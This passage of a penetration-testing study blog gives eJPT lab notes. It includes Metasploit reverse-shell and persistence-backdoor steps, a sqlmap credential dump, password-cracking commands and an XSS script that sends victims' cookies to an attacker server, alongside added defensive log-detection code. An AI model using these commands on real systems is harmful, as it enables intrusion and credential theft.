msf5 exploit(windows/mssql/mssql_payload) > set lhost xxx.xxx.xxx.xxx
msf5 exploit(windows/mssql/mssql_payload) > set lport 5555
#nc -k -l -p 5555
msf5 exploit(windows/mssql/mssql_payload) > exploit

5) Happy hunting!

[eJPT]Find files in Windows

Find files through their filename:
c:\>dir *password*.txt /s /b /p

Find files through their content:
c:\>findstr /s /m /i administrator c:\users

Thursday, April 30, 2020

[eJPT][metasploit][msfvenom][meterpreter]msfvenom -- the backdoor function of Metasploit

#Reference: https://nitesculucian.github.io/2018/07/24/msfvenom-cheat-sheet/


*****Generate the server side:*****
# msfvenom -l encoders
...
x86/shikata_ga_nai
...

# msfvenom -l payloads
...
linux/x86/meterpreter_reverse_tcp
...

# msfvenom -l formats
...
elf
elf-so
exe
...

# msfvenom -p linux/x86/meterpreter_reverse_tcp lhost=xxx.xxx.xxx.xxx lport=xxxxx -e x86/shikata_ga_nai -i 5 -f elf -o ./test.out


*****The client side:*****
# /etc/init.d/postgresql start

# msfconsole
msf5> use exploit/multi/handler

msf5> search type:payload platform:linux

msf5> set payload payload/linux/x64/meterpreter_reverse_tcp

msf5> set LHOST xxx.xxx.xxx.xxx

msf5> exploit -j

msf5> sessions -l

[certificate]ISO 22301 LA


Saturday, April 25, 2020

[eJPT]Add a route in Kali

root@demonalex:~# ip route add 172.16.88.0/24 via 10.175.34.1

root@demonalex:~# netstat -rn
Kernel IP routing table
Destination     Gateway         Genmask         Flags   MSS Window  irtt Iface
...
172.16.88.0     10.175.34.1     255.255.255.0   UG        0 0          0 tap0
...

root@demonalex:~# nmap -sn -n 172.16.88.0/24
Starting Nmap 7.70 ( https://nmap.org ) at 2020-04-25 11:57 EDT
Nmap scan report for 172.16.88.1
Host is up (0.059s latency).
Nmap scan report for 172.16.88.81
Host is up (0.062s latency).
Nmap done: 256 IP addresses (2 hosts up) scanned in 5.87 seconds

Friday, April 24, 2020

[eJPT][metasploit][msfconsole]Metasploit Msfconsole Gameplay

#################################################Basic Gameplay
#/etc/init.d/postgresql start
#msfconsole
>search type:exploit platform:windows               <--Find the appropriate exploit
>use XX
>show options
...
>set XXX XXX
...
>show payloads
>set payload windows/meterpreter/reverse_tcp        <--Select a payload
>set LHOST XXX.XXX.XXX.XXX
>set EXITFUNC process
>run                                                <--Exploit
...
meterpreter>getuid
meterpreter>getsystem                               <--Privilege Escalation
meterpreter>getuid
meterpreter>background
>sessions -l
...



#################################################Install Persistent Backdoor
>use exploit/windows/local/persistence
>show options
...
>set reg_name XXX
>set exe_name XXX
>set startup SYSTEM
>set session 1
>set payload windows/meterpreter/reverse_tcp
>set exitfunc process
>set lhost XXX.XXX.XXX.XXX
>set lport XXXX
>set DisablePayloadHandler false
>exploit                                           <--Install a backdoor. Use exploit -j instead if not working.
...
>use exploit/multi/handler
>set lhost XXX.XXX.XXX.XXX
>set lport XXXX
>set payload windows/meterpreter/reverse_tcp
>exploit -j                                       <--Launch the backdoor client, namely Handler



#################################################Crack Passwords
>sessions -l
>sessions -i 1
meterpreter>hashdump                              <--Dump the hashes of all accounts as the output. Save the output as a file and use John to crack it.



#################################################Search and Download Files
meterpreter>search -f congrats.txt
meterpreter>download 'c:\Documents and Settings\eLSAdmin\My Documents\Congrats.txt' /root/

[eJPT][enum4linux][smbclient]Null Session

1) Use "enum4linux -n" to check whether "<20>" exists:
#enum4linux -n 192.168.1.10

2) If "<20>" exists, a Null Session may be exploitable. Use the following command to get more details:
#enum4linux 192.168.1.10

3) Once a Null Session is confirmed, you can remotely list all shares on the target:
#smbclient -L WORKGROUP -I 192.168.1.10 -N -U ""

4) You can also connect to the remote server with the following command:
#smbclient \\\\192.168.1.10\\c$ -N -U ""

5) Download those files stored on the share drive:
smb: \> get Congratulations.txt

Thursday, April 23, 2020

[eJPT][sqlmap]SQLMap Usage

1) First, find out the breach point, such as http://10.124.211.96/newsdetails.php?id=26.


2) Second, determine the databases:
# sqlmap -u http://10.124.211.96/newsdetails.php?id=26 --dbs
----------------------------------------------------------------------------
[13:29:06] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 4.1
[13:29:07] [INFO] fetching database names
available databases [2]:
[*] awd
[*] information_schema
----------------------------------------------------------------------------


3) Third, determine tables:
# sqlmap -u http://10.124.211.96/newsdetails.php?id=26 -D awd --tables
----------------------------------------------------------------------------
[13:30:37] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 4.1
[13:30:37] [INFO] fetching tables for database: 'awd'
Database: awd
[3 tables]
+----------+
| accounts |
| awards   |
| news     |
+----------+
----------------------------------------------------------------------------


4) Fourth, dump a table's data:
# sqlmap -u http://10.124.211.96/newsdetails.php?id=26 -D awd -T accounts --dump
----------------------------------------------------------------------------
Database: awd                                                                                                                                   
Table: accounts
[11 entries]
+------+-----------------------------------------------------+-------------+-------------------+
| id   | email                                               | password    | displayname       |
+------+-----------------------------------------------------+-------------+-------------------+
| 1    | admin@awdmgmt.labs                                  | S3cr3tBOFH  | Admin             |
| 2    | porta.elit.a@adipiscingMaurismolestie.net           | VUH74DYX6DO | Mallory Reed      |
...
----------------------------------------------------------------------------


5) Fifth, if the vulnerable link requires an extra authentication, attach the cookie with the scanning command:
# sqlmap -u http://10.124.211.96/newsdetails.php?id=26 -D awd -T accounts -p id --cookie="session_level7a=eyJ1c2VyIjoiYWRtaW4ifQ.YSLwbA.3Bixl9Opr1vJ6WU4YLZZUohhDPw" --dump
...

Wednesday, April 22, 2020

[eJPT][eCPPT]Hijack Cookie through XSS

There are four components as follows:
- Attacker Client PC
- Attacker Logging Server
- Vulnerable Server
- Victim Client PC


1) Attacker: first finds a Vulnerable Server and its breach point.

2) Attacker: inject the following snippet in order to hijack the cookie kept by the Victim Client PC (P.S.: the IP address 192.168.99.102 belongs to the Attacker Logging Server in this example):
<script>var i = new Image();i.src="http://192.168.99.102/log.php?q="+document.cookie;</script>

3) Attacker: log into Attacker Logging Server (P.S.: it is 192.168.99.102 in this example), and execute the following command:
#nc -vv -k -l -p 80 >> /root/xss.log

4) Attacker: when Victim Client PC browses the Vulnerable Server, check the output of the command above.

5) Attacker: after obtaining the victim's cookie, use a browser add-on to swap in the victim's cookie and so hijack the victim's privileges. The add-on called EditThisCookie does this for Chromium, and another add-on named Cookie Quick Manager does it for Firefox.
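Added example in Python, from the defender's side (not part of the original post): the injected snippet above sends the victim's cookies to the logging server as a query-string value, so an outbound request whose query string carries a session cookie name, bound for a host other than the page's own, is the signal to hunt for in proxy or web-server logs. The log lines, the cookie-name list and the hosts below are constructed.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Cookie names that carry a session; extend with your application's own names (constructed list)
SESSION_COOKIE_NAMES = {"phpsessid", "jsessionid", "asp.net_sessionid", "sessionid", "session", "auth", "sid"}

# Apache/Squid "combined" style: client ident user [time] "METHOD URL PROTO" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<url>\S+) [^"]*" (?P<status>\d{3}) \S+'
    r'(?: "(?P<referer>[^"]*)" "(?P<ua>[^"]*)")?'
)


def session_names_in(value: str):
    """Session-cookie names inside a query value shaped like document.cookie ("a=1; b=2")."""
    found = []
    for pair in value.split(";"):
        name, sep, _ = pair.strip().partition("=")
        if sep and name.lower() in SESSION_COOKIE_NAMES:
            found.append(name)
    return found


def query_params(query: str):
    """Split a raw query string on '&' only and percent-decode each part (';' must survive)."""
    for item in query.split("&"):
        if not item:
            continue
        name, _, value = item.partition("=")
        yield unquote_plus(name), unquote_plus(value)


def find_cookie_exfil(lines):
    """Return one finding per request whose query string carries a session cookie."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group("url"))
        referer_host = urlsplit(m.group("referer") or "").netloc
        for pname, pvalue in query_params(parts.query):
            leaked = session_names_in(pvalue)
            if leaked:
                findings.append({
                    "client": m.group("client"),
                    "destination": parts.netloc,
                    "param": pname,
                    "cookies": leaked,
                    # a session cookie sent to a host other than the page that set it is the tell
                    "cross_site": bool(referer_host) and referer_host != parts.netloc,
                })
    return findings


# Constructed proxy log lines; the first mirrors the request the snippet above would generate
SAMPLE_LOG = [
    '10.0.0.7 - - [22/Apr/2020:10:15:01 +0000] "GET http://192.168.99.102/log.php?q=PHPSESSID=8f3c1a2b;%20theme=dark HTTP/1.1" 200 43 "http://vulnerable.example/comments" "Mozilla/5.0"',
    '10.0.0.7 - - [22/Apr/2020:10:15:03 +0000] "GET http://vulnerable.example/search?q=password HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [22/Apr/2020:10:16:00 +0000] "GET http://cdn.example/img.png HTTP/1.1" 304 0 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for finding in find_cookie_exfil(SAMPLE_LOG):
        print(finding)
```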

Tuesday, April 21, 2020

[eJPT][Nessus]Installing Nessus v8.10 on 20200421

1) Download the deb file of Nessus from "https://www.tenable.com/downloads/nessus?loginAttempted=true", and store the deb file at /usr/local/sbin.

2) Install it as below shows:
#cd /usr/local/sbin
#dpkg -i ./Nessus-8.10.0-debian6_i386.deb

3) Start Nessus:
#/etc/init.d/nessusd start

4) Open a browser and access "https://127.0.0.1:8834".

5) After the web portal shows up, select "Nessus Essentials" and fill out the form to obtain an Activation Code. Enter the Activation Code that Tenable sends you by email, then create an Admin account. The installation is done.

[eJPT]Network Scan with Fping and Nmap

#fping -a -g 192.168.1.0/24 2>/dev/null
#nmap -sn 192.168.1.0/24

Sunday, April 19, 2020

[eJPT][nmap]Windows Share Enumeration

Enumeration under Linux:
#nmblookup -a IP_ADDRESS
#smbclient -L //IP_ADDRESS -N

Enumeration under Windows:
>nbtstat -A IP_ADDRESS
>net view IP_ADDRESS

Enumeration with Nmap:
#ll /usr/share/nmap/scripts/|grep smb-enum-
-rw-r--r-- 1 root root  4846 Jan  9  2019 smb-enum-domains.nse
-rw-r--r-- 1 root root  5931 Jan  9  2019 smb-enum-groups.nse
-rw-r--r-- 1 root root  8045 Jan  9  2019 smb-enum-processes.nse
-rw-r--r-- 1 root root 27262 Jan  9  2019 smb-enum-services.nse
-rw-r--r-- 1 root root 12057 Jan  9  2019 smb-enum-sessions.nse
-rw-r--r-- 1 root root  6923 Jan  9  2019 smb-enum-shares.nse
-rw-r--r-- 1 root root 12531 Jan  9  2019 smb-enum-users.nse
#nmap --script=smb-enum-users 192.168.1.10

Enumeration with Enum4Linux:
#enum4linux 192.168.1.10

Thursday, April 16, 2020

[eJPT]Hydra Basic Usage

Crack Username and Password at the same time:
#hydra -L USERNAME_LIST.txt -P PASSWORD_LIST.txt PROTOCOL://IP
example:
#hydra -L /usr/share/wordlists/accounts.txt -P /usr/share/wordlists/rockyou.txt ssh://192.168.0.1

Only crack Password:
#hydra -l USERNAME -P PASSWORD_LIST.txt PROTOCOL://IP
example:
#hydra -l root -P /usr/share/wordlists/rockyou.txt telnet://192.168.0.2

Try a username-password pair:
#hydra -l USERNAME -p PASSWORD PROTOCOL://IP
example:
#hydra -l administrator -p test123!@# rdp://192.168.0.3

[eJPT]Password Dictionary

https://wiki.skullsecurity.org/Passwords

Monday, April 13, 2020

[eJPT]A security knowledge base called Seclists

#apt-get update
#apt-get install seclists
#cd /usr/share/seclists
#ll

[eJPT]Keepass2 -- A secure password vault

Reference: https://keepass.info/

Install KeePass2 in Kali:
#apt-get update
#apt-get install keepass2

[eJPT]John the Ripper Cheat Sheet

Combine passwd file with shadow file:
# unshadow ./passwd ./shadow > ./crackme

Brute force the combined file:
# john --incremental --users=root ./crackme
OR without specifying any user:
# john --incremental ./crackme

Dictionary Crack:
# john --wordlist=/usr/share/wordlists/rockyou.txt ./crackme
OR with mangling rules applied:
# john --wordlist=/usr/share/wordlists/rockyou.txt --rules ./crackme

Show what has been cracked so far:
# john --show ./crackme

Crack other formats with John
1) Use the following command to locate the *2john helpers, which convert an encrypted file into a hash John can crack:
# locate *2john
2) Extract a hash from an encrypted file (e.g. RAR):
# rar2john ./encrypted.rar > ./encrypted.rar.hash
3) Crack it:
# john --wordlist=/usr/share/wordlists/rockyou.txt ./encrypted.rar.hash

Friday, April 10, 2020

[eJPT]Directory Brute Force

1) OWASP DirBuster
In Kali, execute the following command:
# dirbuster
Enter the target's information and choose the wordlists under /usr/share/dirbuster/wordlists before performing the scan.

2) DirB
In Kali, run the command below:
# dirb https://www.google.com /usr/share/dirb/wordlists/vulns/apache.txt

[python][eJPT] Check HTTP Verbs

#!/usr/bin/python3
#https://github.com/d3m0n4l3x/python/blob/master/toys/check_http_options.py
import http.client
import sys


def get_allowed_methods(target, port=80, timeout=10):
    """Send OPTIONS / and return the value of the Allow header, or None if absent."""
    conn = http.client.HTTPConnection(target, port, timeout=timeout)
    try:
        conn.request("OPTIONS", "/")
        response = conn.getresponse()
        # Header lookup is case-insensitive, so no regex over the header list is needed
        return response.getheader("Allow")
    finally:
        conn.close()


if __name__ == "__main__":
    target = input("Your Target: ")
    port = input("TCP Port (default: 80): ")
    port = int(port) if port else 80

    try:
        allow = get_allowed_methods(target, port)
    except (OSError, http.client.HTTPException) as exc:
        sys.exit(f"Request failed: {exc}")

    if allow:
        print(f"Allow: {allow}")
    else:
        print("There is no Allow field!")


Wednesday, April 8, 2020

[eJPT]Utilizing HTTPrint to perform Banner Grabbing

HTTPrint is a tool helping carry out an automatic Banner Grabbing.

Examples are shown below:

# httprint -P0 -s /usr/share/httprint/signatures.txt -h 1.2.3.4
# httprint -P0 -s /usr/share/httprint/signatures.txt -h https://1.2.3.4

[eJPT]Connect SSL service with Raw Socket

Normally, two tools are used to connect to an SSL service over a raw socket: OpenSSL and Ncat.

Examples are shown below:

# openssl s_client -connect mail.google.com:443

# ncat --ssl -vv mail.google.com 443

The output coming from OpenSSL shows more details.

Monday, April 6, 2020

[HTB][eJPT][eCPPT]Nmap Cheat Sheet

1) Network / Host Scan (through ICMP)
Scan a network:
#nmap -sn -n 192.168.1.0/24
Scan the same network segment without using ARP scan:
#nmap -sn -n --disable-arp-ping 192.168.1.0/24


1.5) Network / Host Scan through ARP
Scan a network through ARP by using the command, nping:
#nping --arp-type ARP 192.168.0.0/24


2) Port Scan (covering TCP & UDP)
TCP Port Scan:
#nmap -Pn -sT -p23,80 192.168.1.80
UDP Port Scan:
#nmap -Pn -sU -p1-10 192.168.1.80


3) Service Scan
Do OS/Service scan against a TCP port of an IP:
#nmap -O -sV -sT -p 80 192.168.1.80
Do OS/Service scan against an IP through UDP scan:
#nmap -O -sV -sU 192.168.1.80


4) Vulnerability Scan
Upgrade scripts:
#nmap --script-updatedb
Common Script Scan against an IP:
#nmap -sC 192.168.1.80
Vulnerability Scan:
#nmap --script vuln 10.10.10.40
Apply only those SAFE scripts to the vulnerability scan:
#nmap --script safe 10.10.10.40
Apply all scripts to scan a target:
#nmap --script all 10.10.10.40
Vulnerability Scan with SearchSploit's assistance:
#searchsploit -u ; nmap 192.168.1.1 -sV --open -oX ~/nmap.xml ; searchsploit -v --nmap ~/nmap.xml > ./exploits.txt


5) Combination Scan
Scan all ports and corresponding vulnerabilities of multiple IP addresses:
#nmap -sT -sV -O -p- -T4 -sC 192.168.1.100,101,102


6) Sneaky Scan
SYN Scan:
#nmap -sS -sV 192.168.0.80
Decoy Scan:
#nmap -Pn -sT -D 192.168.0.88,172.16.0.13,10.0.0.13,ME 192.168.1.80
IDLE Scan (the zombie, such as TCP port 443 of 192.168.0.251 in the following case, must exist):
#nmap -p22 -sI 192.168.0.251:443 192.168.0.253


7) Filtering Determination Scan
Determine the existence of Firewall/Filtering by utilizing "-sA" scan:
#nmap -sA -p- -T4 -n 192.168.0.0/24

[eJPT]Discovering a subdomain of a target

Below are three easy ways to pinpoint subdomains:

1) Google Hacking
site:company.com

2) Use https://dnsdumpster.com/

3) Utilize sublist3r
sublist3r -d company.com

Monday, March 23, 2020

Install VirtualBox 6.1 in Kali 20190318

#echo 'deb [arch=amd64] https://download.virtualbox.org/virtualbox/debian buster contrib' >> /etc/apt/sources.list
#wget -q https://www.virtualbox.org/download/oracle_vbox_2016.asc -O- | sudo apt-key add -
#apt-get update
#apt-get install virtualbox-6.1

Sunday, March 15, 2020

Hacking training with labs - updated on 20200315

Offensive Security:
https://www.offensive-security.com/courses-and-certifications/

eLearnSecurity:
https://www.elearnsecurity.com/certification/

Pentester Academy:
https://www.pentesteracademy.com/topics

Pentester Lab:
https://pentesterlab.com/

Mile2:
https://mile2.com/

Tuesday, March 3, 2020

Disable IKE Aggressive Mode to disable Pre-Shared Key

Reference: https://www.cisco.com/en/US/docs/ios/security/command/reference/sec_c4.pdf

(config)# crypto isakmp aggressive-mode disable

Check VPN IKE Pre-Shared Key vulnerability

Scan it:
#nmap -Pn -A -v -sU -p 500 127.0.0.1

Obtain the pre-shared key:
#ike-scan -M 127.0.0.1 -A --id=:cisco -Pvpn1.psk

Crack it:
#psk-crack ./vpn1.psk
#psk-crack --bruteforce=10 --charset=0123456789abcdefghijklmnopqrstuvwxyz ./vpn1.psk

Sunday, March 1, 2020

Hacker101 Checklist

XSS
SQLi
Session Fixation
Clickjacking
File Inclusion
File Upload
Null Terminator

Saturday, February 29, 2020

The means to prevent ClickJacking

Reference: https://www.hacksplaining.com/prevention/click-jacking

1) X-Frame-Options (the most traditional means; setting it to DENY is recommended)
2) Content Security Policy (HTML5)
3) Frame-Killing
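Added example in Python (not from the original post or the referenced site): a small audit of the two header-based defences above, run over constructed response header sets. It treats CSP frame-ancestors as taking precedence over X-Frame-Options, which is how browsers that support it behave, and it cannot judge frame-killing JavaScript, which lives in the page body rather than in headers.

```python
from typing import Dict, List, Optional

# Sources that let any origin frame the page
PERMISSIVE_SOURCES = {"*", "http:", "https:", "http://*", "https://*"}


def parse_csp(value: str) -> Dict[str, List[str]]:
    """Split a Content-Security-Policy header value into {directive: [source, ...]}."""
    policy: Dict[str, List[str]] = {}
    for directive in value.split(";"):
        tokens = directive.split()
        if tokens:
            policy[tokens[0].lower()] = [t.lower() for t in tokens[1:]]
    return policy


def audit_framing_protection(headers: Dict[str, str]) -> dict:
    """Report which header-based clickjacking defences one response carries."""
    lower = {k.lower(): v for k, v in headers.items()}
    xfo = lower.get("x-frame-options", "").strip().upper()
    frame_ancestors = parse_csp(lower.get("content-security-policy", "")).get("frame-ancestors")
    notes: List[str] = []

    xfo_ok = False
    if xfo in ("DENY", "SAMEORIGIN"):
        xfo_ok = True
    elif xfo.startswith("ALLOW-FROM"):
        notes.append("ALLOW-FROM is obsolete and ignored by current browsers; use CSP frame-ancestors")
    elif xfo:
        notes.append(f"invalid X-Frame-Options value {xfo!r} is ignored by browsers")
    else:
        notes.append("X-Frame-Options missing (legacy browsers fall back to it)")

    csp_ok: Optional[bool] = None
    if frame_ancestors is not None:
        csp_ok = not any(src in PERMISSIVE_SOURCES for src in frame_ancestors)
        if not csp_ok:
            notes.append("frame-ancestors allows any origin")
        elif xfo_ok and frame_ancestors != ["'none'"]:
            notes.append("frame-ancestors takes precedence over X-Frame-Options; the listed origins may frame the page")
    else:
        if "content-security-policy-report-only" in lower:
            notes.append("a report-only CSP does not block framing")
        notes.append("CSP frame-ancestors missing")

    return {
        "x_frame_options": xfo or None,
        "frame_ancestors": frame_ancestors,
        # browsers that understand frame-ancestors use it and ignore X-Frame-Options
        "protected": csp_ok if csp_ok is not None else xfo_ok,
        "notes": notes,
    }


# Constructed response header sets, one per situation worth recognising
SAMPLE_RESPONSES = {
    "hardened": {"X-Frame-Options": "DENY", "Content-Security-Policy": "default-src 'self'; frame-ancestors 'none'"},
    "legacy_only": {"X-Frame-Options": "SAMEORIGIN"},
    "partner_framing": {"X-Frame-Options": "DENY", "Content-Security-Policy": "frame-ancestors https://partner.example"},
    "open": {"Content-Security-Policy": "frame-ancestors *"},
    "obsolete": {"X-Frame-Options": "ALLOW-FROM https://partner.example"},
    "none": {"Content-Type": "text/html"},
}

if __name__ == "__main__":
    for name, headers in SAMPLE_RESPONSES.items():
        print(name, audit_framing_protection(headers))
```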

Sunday, February 9, 2020

Social Engineering Test Play Book

Preparation: What information needs to be imported into the whitelists of SPAM firewalls and Web Proxy?

What information needs to be import in Social Engineering Test platform?

How to launch a phishing campaign?

What to do when users report incident to IT department or IS department?

What to do when users are compromised?

How to generate reports in Social Engineering Test platform?

Thursday, February 6, 2020

[Threat Intelligence] Threat Hunting tools

(On Premise)
SpiderFoot

(GUI)
maltego

(Command)
theharvester

(Cloud)
RiskIQ PassiveTotal

Sunday, February 2, 2020

[Threat Intelligence] Install and use Spiderfoot through Docker

#/etc/init.d/docker start
#docker pull ctdc/spiderfoot
#docker run -idt -p 5001:5001 ctdc/spiderfoot

Browse http://127.0.0.1:5001 and enjoy Spiderfoot.

[Updated] The network hidden script through Tor, Privoxy, and ProxyChains

#!/usr/bin/perl -w
#A network hidden script through Tor and Privoxy. Written by demonalex.
$|=1;
$proxychains=0; #initialised so the check at the end never reads an undefined value

if( -e '/etc/init.d/tor'){
 print "Tor: Installed!\n";
}else{
 die "Tor: Not installed! Please install Tor through \'apt-get update\; apt-get install tor\'!\n";
}

print "Starting Tor...\n";
system('/etc/init.d/tor start 2>/dev/null');

sleep(2);

print "Check Tor\'s status...";
$output=sprintf(`netstat -anteup|grep tor|grep \'127.0.0.1:9050\'|wc -l`);
chop($output);
if($output==1){
 print "ok!\n";
}else{
 die "failed!\n";
}

if ( -e '/etc/init.d/privoxy'){
 print "Privoxy: Installed!\n";
}else{
 die "Privoxy: Not installed! Please install Privoxy through \'apt-get update\; apt-get install privoxy\'!\n";
}

print "Checking Privoxy\'s configuration...\n";
$output=sprintf(`cat /etc/privoxy/config|grep forward-socks5|grep -v \'#\'|wc -l`);
chop($output);
if($output==0){
 die "forward-socks5 has not been tweaked yet!\n";
}
$output=sprintf(`cat /etc/privoxy/config|grep \'\\[::1\\]:8118\'|grep -v \'#\'|wc -l`);
chop($output);
if($output!=0){
 die "listen-address IPv6 has not been disabled yet!\n";
}
print "Complete!\n";

print "Starting Privoxy...\n";
system('/etc/init.d/privoxy start 2>/dev/null');

sleep(2);

print "Check Privoxy\'s status...";
$output=sprintf(`netstat -anteup|grep \'127.0.0.1:8118\'|wc -l`);
chop($output);
if($output==1){
 print "ok!\n";
}else{
 die "failed!\n";
}

print "Check ProxyChains's status...";
if(!( -e '/etc/proxychains.conf')){
 print "ProxyChains does not exist!\n";
}else{
 $output=`cat /etc/proxychains.conf |grep sock | grep -v \'\#\'|grep \'127.0.0.1\' | grep 9050|wc -l`;
 chop($output);
 if($output>=1){
  print "okay!\n";
  $proxychains=1;
 }else{
  print "Tor proxy has not been added yet!\n";
 }
}

print <<EndOutput;

HTTP/S Proxy: 127.0.0.1:8118
Socks5 Proxy: 127.0.0.1:9050
EndOutput

if($proxychains==1){
 print 'ProxyChains: #proxychains COMMAND'."\n";
 print "Such as: #proxychains curl ipv4.icanhazip.com"."\n\n";
}else{
 print "\n\n";
}

exit(0);

Tuesday, January 28, 2020

HTTP Security Scan through Kali

Copied from https://ired.team/offensive-security-experiments/offensive-security-cheetsheets

target=10.0.0.1; gobuster -u http://$target -r -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt -t 150 -l | tee $target-gobuster
target=10.0.0.1; nikto -h http://$target:80 | tee $target-nikto
target=10.0.0.1; wpscan --url http://$target:80 --enumerate u,t,p | tee $target-wpscan-enum

[dns][reconnaissance] DNS Enumeration updated on 20200128

whois domain.com
dnsrecon -d domain.com
dnsenum domain.com
gobuster -m dns -t 100 -u domain.com -w /usr/share/wordlists/metasploit/namelist.txt

Monday, January 27, 2020

[Tor] Specify the Exit Node of Tor

#vi /etc/tor/torrc
Add the following two lines on the very bottom:
ExitNodes {br}
StrictNodes 1
:wq
#/etc/init.d/tor restart

The br above is the country code for Brazil; with these two lines, Tor is confined to exit nodes located in Brazil.
For more country codes, see:
https://en.wikipedia.org/wiki/Country_code_top-level_domain

Sunday, January 26, 2020

A Snort-like SIEM called Sagan

https://github.com/beave/sagan

A network-hiding script using Tor and Privoxy

#!/usr/bin/perl -w
$|=1;

if( -e '/etc/init.d/tor'){
 print "Tor: Installed!\n";
}else{
 die "Tor: Not installed! Please install Tor through \'apt-get update\; apt-get install tor\'!\n";
}

print "Starting Tor...\n";
system('/etc/init.d/tor start 2>/dev/null');

sleep(2);

print "Check Tor\'s status...";
$output=sprintf(`netstat -anteup|grep tor|grep \'127.0.0.1:9050\'|wc -l`);
chop($output);
if($output==1){
 print "ok!\n";
}else{
 die "failed!\n";
}

if ( -e '/etc/init.d/privoxy'){
 print "Privoxy: Installed!\n";
}else{
 die "Privoxy: Not installed! Please install Privoxy through \'apt-get update\; apt-get install privoxy\'!\n";
}

print "Checking Privoxy\'s configuration...\n";
$output=sprintf(`cat /etc/privoxy/config|grep forward-socks5|grep -v \'#\'|wc -l`);
chop($output);
if($output==0){
 die "forward-socks5 has not been tweaked yet!\n";
}
$output=sprintf(`cat /etc/privoxy/config|grep \'\\[::1\\]:8118\'|grep -v \'#\'|wc -l`);
chop($output);
if($output!=0){
 die "listen-address IPv6 has not been disabled yet!\n";
}
print "Complete!\n";

print "Starting Privoxy...\n";
system('/etc/init.d/privoxy start 2>/dev/null');

sleep(2);

print "Check Privoxy\'s status...";
$output=sprintf(`netstat -anteup|grep \'127.0.0.1:8118\'|wc -l`);
chop($output);
if($output==1){
 print "ok!\n";
}else{
 die "failed!\n";
}

print <<EndOutput;

HTTP/S Proxy: 127.0.0.1:8118
Socks5 Proxy: 127.0.0.1:9050

EndOutput

exit(0);

Monday, January 20, 2020

Common activities of an IT Risk Practitioner

According to <Risk Management Policy>: Carry out IT Risk Assessment annually.
According to <Risk Management Policy>: Maintain the Risk Assessment ledger, Risk Register records, KRI list, and Risk Appetite.
According to <Risk Management Policy>: Periodically generate an IT Risk Monitoring report so that Management can oversee risks in a real-time manner.
According to <Change Management Procedure>: Oversee change risks during the Change Management process as an SME.
According to <Project Management Policy>: Oversee project risks during the Project Management process as an SME.
According to <Third-party Management Policy>: Oversee third-party risks during the Third-party Management process as an SME. Check Master Agreements and SOWs and ensure that IT Risk remediations are covered.
According to <System Management Policy>: During the Requirement Specification documentation period, maintain a System Security Requirement template and ensure that it can be integrated into each Requirement Specification document.
According to <System Management Policy>: During the System Design and Implementation phases, run Threat Modeling in order to uncover system risks in advance.
According to <System Management Policy>: During the UAT phase, coordinate with project teams to complete the IT Risk-related test cases.

Wednesday, January 15, 2020

Utilize HTTrack to crawl Dark Web

Reference: http://www.httrack.com/html/httrack.man.html


Install Tor:
#apt-get update
#apt-get install tor


Install HTTrack:
#apt-get install httrack


Install Privoxy:
#apt-get install privoxy


Some Preparation:
#mkdir -p /usr/local/sbin/httrack_log
#vi /etc/privoxy/config
---------------------------------
#Uncomment the following line:
     forward-socks5t  /  127.0.0.1:9050 .
#And comment the following line:
#listen-address [::1]:8118
#:wq!
---------------------------------


Launch a scan:
#/etc/init.d/tor start
#/etc/init.d/privoxy start
#httrack "http://gdaqpaukrkqwjop6.onion/" -O "/usr/local/sbin/httrack_log" "+gdaqpaukrkqwjop6.onion/*" -v -P 127.0.0.1:8118 -s0
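The Privoxy and ProxyChains checks that the Perl script above performs with grep can be done more robustly by parsing the files directly, ignoring comment lines and matching the exact forward rule. The following Python is an added example, not the blog's own code; it runs on constructed sample configs that mirror the Privoxy edit above and a proxychains.conf with the Tor SOCKS entry added.

```python
import re

# Constructed sample files (not the blog's), reflecting the Privoxy edit
# above and a proxychains.conf with the Tor SOCKS entry added.
PRIVOXY_CONFIG = """\
listen-address  127.0.0.1:8118
#listen-address [::1]:8118
#        forward-socks5   /  127.0.0.1:9050 .
        forward-socks5t  /  127.0.0.1:9050 .
"""
PROXYCHAINS_CONF = """\
[ProxyList]
# socks4 127.0.0.1 9050
socks5 127.0.0.1 9050
"""

def active_lines(text):
    """Yield non-empty lines that are not comments (leading '#')."""
    for raw in text.splitlines():
        line = raw.strip()
        if line and not line.startswith("#"):
            yield line

def check_privoxy(text):
    """Return the problems the blog's script dies on; [] means Tor-ready.
    Requires a live forward-socks5/forward-socks5t rule to 127.0.0.1:9050
    and rejects any uncommented IPv6 listener on [::1]:8118."""
    lines = list(active_lines(text))
    fwd = re.compile(r"^forward-socks5t?\s+/\s+127\.0\.0\.1:9050\s+\.$")
    problems = []
    if not any(fwd.match(l) for l in lines):
        problems.append("forward-socks5 has not been tweaked yet")
    if any(l.startswith("listen-address") and "[::1]:8118" in l for l in lines):
        problems.append("listen-address IPv6 has not been disabled yet")
    return problems

def check_proxychains(text):
    """True if an uncommented socks4/socks5 entry for 127.0.0.1 9050 exists."""
    entry = re.compile(r"^socks[45]\s+127\.0\.0\.1\s+9050$")
    return any(entry.match(l) for l in active_lines(text))

if __name__ == "__main__":
    # Check the live files the procedure above edits.
    with open("/etc/privoxy/config") as f:
        print(check_privoxy(f.read()) or "Privoxy: ok")
    with open("/etc/proxychains.conf") as f:
        print("ProxyChains: ok" if check_proxychains(f.read())
              else "Tor proxy has not been added yet")
```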

Tuesday, January 14, 2020

Three common web crawlers running under Kali Linux

1) SkipFish
#mkdir -p /usr/local/sbin/skipfish_log; skipfish -o /usr/local/sbin/skipfish_log http://www.163.com; tree -a /usr/local/sbin/skipfish_log; grep -nR test /usr/local/sbin/skipfish_log

2) Metasploit
msf5>use auxiliary/crawler/msfcrawler

3) HTTrack
#mkdir -p /usr/local/sbin/httrack_log; httrack http://www.163.com -O /usr/local/sbin/httrack_log; tree -a /usr/local/sbin/httrack_log; grep -nR test /usr/local/sbin/httrack_log

A list of firewall auditing vendors

https://www.firemon.com/products/policy-optimizer/
https://www.algosec.com/firewall-analyzer/
